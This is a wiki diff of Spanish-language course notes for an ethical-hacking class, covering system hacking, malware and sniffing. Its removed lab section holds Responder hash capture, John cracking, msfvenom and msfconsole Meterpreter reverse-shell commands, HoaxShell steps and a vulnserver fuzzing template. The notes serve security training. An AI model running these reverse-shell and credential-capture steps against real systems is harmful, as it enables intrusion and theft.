Diferències

Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.

Enllaç a la visualització de la comparació

Ambdós costats versió prèvia Revisió prèvia
Següent revisió
Revisió prèvia
info:cursos:pue:ethical-hacker:sesion2 [18/02/2025 06:19] – [lab 2: Perform Privilege Escalation to Gain Higher Privileges] mateinfo:cursos:pue:ethical-hacker:sesion2 [20/02/2025 23:51] (actual) mate
Línia 3: Línia 3:
  
 == clase == clase
-  * Modulo 06+  * ASPEN 
 +    * Modulo 06 - System Hacking 
 +    * Modulo 07 - Malware 
 +    * Modulo 08 - Sniffing
  
 === Modulo 06, apuntes === Modulo 06, apuntes
  
  
-=== Modulo 06+=== Modulo 06 - System Hacking
 ==== sección 1 ==== sección 1
   * hash   * hash
Línia 149: Línia 152:
   * ''history''   * ''history''
  
-=== Lab 1: Sytem hacking 
-==== task 1: Gain Access to the System 
-  - ''sudo responder -I eth0'' -> capturar hash máquina W11 en txt -> hash.txt 
-  - ''john hash.txt'' -> desencripta la contraseña del hash 
- 
-==== task 2: Gain Access to a Remote System using Reverse Shell Generator 
-===== cmd 
-  * ''docker run -d -p 80:80 reverse_shell_generator'' 
-  * ''http://localhost'' 
-    * IP, Port, MSFVenom -> genera instrucción: ''msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe'' 
-    * se genera un EXE - payload (que hemos de conseguir que ejecute la víctima) 
-    * generamos la instrucción para escuchar el payload, en la sección LISTENER, modo **msfconsole** 
-      * ''msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit"'' 
-    * ejecutamos el listener, ejecutamos el payload 
-      * ''getuid'' 
- 
-===== powershell 
-  * ''http://localhost'' 
-    * HoaxShell -> PowerShell IEX -> cambiar puerto en el script generado por 444 
-    * copiar y guardar en shell.ps1 
-    * ir a la sección **listener** y generar para HoaxShell (puerto 444) 
-    * ejecutar instrucción generada con sudo: ''sudo python...'' 
-    * ejecutamos en un powershell subido a Administrador el script .ps1 
- 
-==== Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System 
-  * ejecutar como administrador ''vulnserver'' (buffer overflow tools) 
-  * instalar **ImmunityDebugger_1_85_setup.exe** (y Python 2.7) 
-  * ejecutar como administrador 
-    * File -> Attach -> vulnserver <- pausado 
-    * Icono PLAY 
-  * en Linux, ejecutamos ''nc -nv 10.10.1.11 9999'' 
-    * HELP nos lista los comandos disponibles 
-    * QUIT para salir 
-    * creamos un "spike template" -> ''pluma stats.spk'':<code>s_readline(); 
- 
-s_string(“STATS ”); 
- 
-s_string_variable(“0”);</code> 
-    * ''generic_send_tcp 10.10.1.11 9999 stats.spk 0 0'' 
-      * los dos últimos ceros son SKIPVAR y SKIPSTR 
-    * ejecuta y podemos ver en ImmunityDebugger que la opción STAT no es vulnerable 
-    * Se hace lo mismo cambiando **STAT** por **TRUN** 
-    * PENDIENTE 
  
 === Modulo 7: malware === Modulo 7: malware
Línia 247: Línia 207:
  
  
-=== lab 2: Perform Privilege Escalation to Gain Higher Privileges 
-==== Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys 
  
 +=== Modulo 8: sniffing
 +  * hub reparte entre todos los puertos, los switch no <- problema para el modo promíscuo
 +  * switch SPAN Port (modo promíscuo)
 +
 +==== sección 2
 +  * MAC: 3 primeros fabricante, 3 siguientes 
 +  * http://standards-oui.ieee.org/oui/oui.txt - Listado de fabricantes y sus MACs asociadas
 +  * ARP:
 +    * broadcast, no sale a internet, solo LAN, solo IPv4
 +      * en IPv6 es ND, integrado en ICMP -> https://es.wikipedia.org/wiki/Neighbor_Discovery - Neighbor Discovery (ND) protocolo de IPv6, equivalente al protocolo Address Resolution Protocol (ARP) en IPv4. Está integrado en ICMPv6.
 +  * tabla CAM
 +    * si se llena la tabla, no se reparte tráfico
 +    * saturar para cambiar a modo HUB -> ''macof''
 +  * Switch Port Stealing
 +    * hacer creer que la máquina ha cambiado de puerto, recibir el tráfico y redirigir a la original
 +  * DHCP Starvation Attack
 +    * hambruna
 +    * DoS
 +  * Rogue DHCP Server Attack
 +  * ARP Spoofing attack
 +  * Capsa Portable Network Analyzer
 +  * IRDP Spoofing
 +  * VLAN Hopping
 +    * ver todas las VLAN
 +  * STP Attack
 +  * DNS Poisoning
 +    * punto débil de internet
 +    * https://blog.cloudflare.com/es-es/oblivious-dns/
 +  * Detección
 +    * modo promíscuo
 +    * nmap detecta (script)
 +
 +
 +== Examen
 +  * udemy test
 +  * examtopics (pago)
 +  * ProxMox
  • info/cursos/pue/ethical-hacker/sesion2.1739888354.txt.gz
  • Darrera modificació: 18/02/2025 06:19
  • per mate